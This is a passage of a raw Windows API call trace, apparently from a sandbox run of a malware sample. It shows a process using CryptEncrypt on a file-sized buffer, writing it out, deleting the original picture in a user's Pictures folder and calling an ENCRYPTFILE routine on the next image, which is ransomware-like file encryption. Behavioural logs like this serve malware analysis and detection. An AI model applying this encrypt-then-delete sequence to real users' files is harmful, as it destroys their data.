[0090.986] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0090.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0090.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0090.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0090.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0090.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0090.988] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.988] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.988] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.988] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca4a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.991] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x11095, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x110a0) returned 1 [0090.991] CharLowerBuffW (in: lpsz="byte[69793]", cchLength=0xb | out: lpsz="byte[69793]") returned 0xb [0090.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca928, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.994] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e790*=0x11095, dwBufLen=0x110a0 | out: pbData=0x499a008*, pdwDataLen=0x144e790*=0x110a0) returned 1 [0090.994] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0090.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0090.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.997] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x110a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0x110a0, lpOverlapped=0x0) returned 1 [0091.000] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0091.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca1f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0091.000] CryptDestroyKey (hKey=0x41ac540) returned 1 [0091.000] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0091.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0091.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.000] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0091.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0091.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.001] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0091.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0091.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0091.001] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0091.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.001] FreeLibrary (hLibModule=0x756e0000) returned 1 [0091.001] CloseHandle (hObject=0x298) returned 1 [0091.001] CloseHandle (hObject=0x258) returned 1 [0091.069] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp", lpFilePart=0x0) returned 0x28 [0091.070] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\xwg8sj1nv9u.bmp")) returned 0x20 [0091.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0091.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0091.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0091.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0091.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0091.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0091.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0091.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0091.070] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c96c10, ftCreationTime.dwHighDateTime=0x1d5ec63, ftLastAccessTime.dwLowDateTime=0x4abbb4e0, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x4abbb4e0, ftLastWriteTime.dwHighDateTime=0x1d5e480, nFileSizeHigh=0x0, nFileSizeLow=0x11095, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="XwG8Sj1nv9U.bmp", cAlternateFileName="XWG8SJ~1.BMP")) returned 0x41ac2c0 [0091.070] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\xwg8sj1nv9u.bmp")) returned 1 [0091.161] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c96c10, ftCreationTime.dwHighDateTime=0x1d5ec63, ftLastAccessTime.dwLowDateTime=0x4abbb4e0, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x4abbb4e0, ftLastWriteTime.dwHighDateTime=0x1d5e480, nFileSizeHigh=0x0, nFileSizeLow=0x11095, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="XwG8Sj1nv9U.bmp", cAlternateFileName="XWG8SJ~1.BMP")) returned 0 [0091.161] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0091.162] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0091.162] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0091.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0091.163] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0091.163] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0091.163] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0091.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0091.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0091.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0091.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0091.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0091.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0091.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0091.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0091.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b78 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0091.164] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0091.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0091.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0091.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0091.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0091.165] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0091.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0091.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0091.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0091.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0091.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0091.165] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c7a780, ftCreationTime.dwHighDateTime=0x1d5ed1f, ftLastAccessTime.dwLowDateTime=0xa20a2780, ftLastAccessTime.dwHighDateTime=0x1d5eb16, ftLastWriteTime.dwLowDateTime=0xa20a2780, ftLastWriteTime.dwHighDateTime=0x1d5eb16, nFileSizeHigh=0x0, nFileSizeLow=0xfa89, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="YwIpia.gif", cAlternateFileName="")) returned 0x41ac540 [0091.165] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0091.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0091.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0091.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0091.166] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0091.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0091.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0091.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0091.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0091.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0091.167] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0091.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0091.167] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0091.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0091.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2280 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0091.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0091.167] 